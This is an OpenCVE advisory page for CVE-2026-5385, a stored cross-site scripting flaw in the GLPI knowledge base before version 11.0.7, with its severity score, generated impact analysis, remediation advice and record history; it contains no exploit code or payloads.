Description
An unauthenticated user with write access to the knowledge base can store an XSS payload in a knowledge base item.


This issue affects glpi: before 11.0.7.
Published: 2026-06-02
Score: 8.4 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An unauthenticated user who has write access to the knowledge base can embed an XSS payload in a knowledge base item. The vulnerability allows the payload to be stored and later executed in the browsers of any user who views the item, potentially enabling cookie theft, account hijacking, or phishing attacks. The weakness matches CWE‑79, focused on improper input validation that leads to client‑side script injection.

Affected Systems

The issue affects all GLPI Product releases prior to version 11.0.7. Users running any older GLPI build should identify whether they are on an unsupported release and determine if they have any write access to the knowledge base module.

Risk and Exploitability

The CVSS score of 8.4 classifies the flaw as high severity. The EPSS score is not available, and the vulnerability is not listed in CISA KEV. The attack vector requires the attacker to obtain write permission on the knowledge base—an unauthenticated user with such rights can inject the malicious content. Once injected, all users who view the knowledge base item are exposed to the client‑side code, making this a significant risk for organizations using GLPI without hardened access controls.

Generated by OpenCVE AI on June 3, 2026 at 04:41 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Install the latest GLPI release (11.0.7 or newer) to patch the stored XSS flaw.
  • Restrict or remove write permissions on the knowledge base for unauthenticated or non‑privileged users to prevent injection.
  • Ensure that input is thoroughly sanitized or use GLPI input filtering mechanisms, and optionally deploy a web‑application firewall to block malicious scripts.

Generated by OpenCVE AI on June 3, 2026 at 04:41 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 03 Jun 2026 04:45:00 +0000

Type Values Removed Values Added
First Time appeared Glpi-project
Glpi-project glpi
Vendors & Products Glpi-project
Glpi-project glpi

Wed, 03 Jun 2026 02:30:00 +0000

Type Values Removed Values Added
Description An unauthenticated user with write access to the knowledge base can store an XSS payload in a knowledge base item. This issue affects glpi: before 11.0.7.
Title GLPI 11.0.0 - Stored XSS in knowledge base
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 8.4, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N'}

Subscriptions

Glpi-project Glpi
cve-icon MITRE

Status: PUBLISHED

Assigner: Fluid Attacks

Published:

Updated: 2026-06-02T18:32:01.150Z

Reserved: 2026-04-01T20:34:27.215Z

Link: CVE-2026-5385

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Received

Published: 2026-06-02T20:16:40.840

Modified: 2026-06-02T20:16:40.840

Link: CVE-2026-5385

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-03T04:30:05Z

Weaknesses